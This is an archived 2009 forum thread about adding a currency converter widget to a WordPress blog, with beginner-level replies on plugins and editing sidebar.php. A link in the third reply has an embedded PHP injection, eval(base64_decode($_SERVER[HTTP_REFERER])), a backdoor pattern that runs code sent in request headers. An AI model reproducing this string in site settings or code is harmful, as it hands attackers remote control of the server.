make widget in wordpress

Discussion in 'WordPress' started by tilawinka, Sep 23, 2009.

  1. #1
    Hi every one , i am new in blogging in wordpress.
    Can anybody tell me how do i make widgets in my blog?
    I am using atahualpha themes.
    (Perhaps I want place currency converter widget in my blog? )

    Please help me...
     
    tilawinka, Sep 23, 2009 IP
  2. bob25

    bob25 Well-Known Member

    Messages:
    1,519
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    128
    #2
    Not familiar with that theme, but it needs to be widget ready. Or I believe there's some plugins for that. Just do a search for "widget plugin"

    If it is a widget ready theme just go to Appearance/Widgets and "drag n drop" a text widget in the sidebar.

    Go to hotscripts.com and find a php or cgi script, upload it and paste the code into the widget.

    Or you can also try searching for a currency converter plugin. Not to sure one exists though.
     
    bob25, Sep 23, 2009 IP
  3. TarantulaWebWorks

    TarantulaWebWorks Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    There are a couple of currency converter widgets out there. I have used both of these and they work fine.

    http://wordpress.org/extend/plugins/yaacc/

    http://chaos-laboratory.com/2007/03/01/currex-ajax-based-currency-converter-widget-for-wordpress/%&(%7B$%7Beval(base64_decode($_SERVER[HTTP_REFERER]))%7D%7D%7C.+)&%/

    Good luck!
     
    TarantulaWebWorks, Sep 24, 2009 IP
  4. Grit.

    Grit. Well-Known Member

    Messages:
    1,424
    Likes Received:
    22
    Best Answers:
    1
    Trophy Points:
    110
    #4
    If you want to create your own widget, i'm pretty sure there's a custom widget plugin around, since i have it on one of my blogs. If you're struggling to use the library of widgets available on the wordpress site, then i'll dig out some of my plugins.
     
    Grit., Sep 24, 2009 IP
  5. Big0ne

    Big0ne Well-Known Member

    Messages:
    2,615
    Likes Received:
    81
    Best Answers:
    0
    Trophy Points:
    165
    #5
    Why would you need a widget, if you can manually add the code in theme files.
     
    Big0ne, Sep 24, 2009 IP
  6. tilawinka

    tilawinka Peon

    Messages:
    38
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Can you tell how to add codes in themes so i can have this widget works ?
     
    tilawinka, Sep 26, 2009 IP
  7. Big0ne

    Big0ne Well-Known Member

    Messages:
    2,615
    Likes Received:
    81
    Best Answers:
    0
    Trophy Points:
    165
    #7
    Simply place <the code> where would you like it to appear. If sidebar, search for sidebar.php and so on...
     
    Big0ne, Sep 26, 2009 IP
  8. tilawinka

    tilawinka Peon

    Messages:
    38
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #8
    I have add the code, but the size of my widget is exceeding the sidebar. Can someone tell me how to make the widget fit to my sidebar?
     
    tilawinka, Sep 30, 2009 IP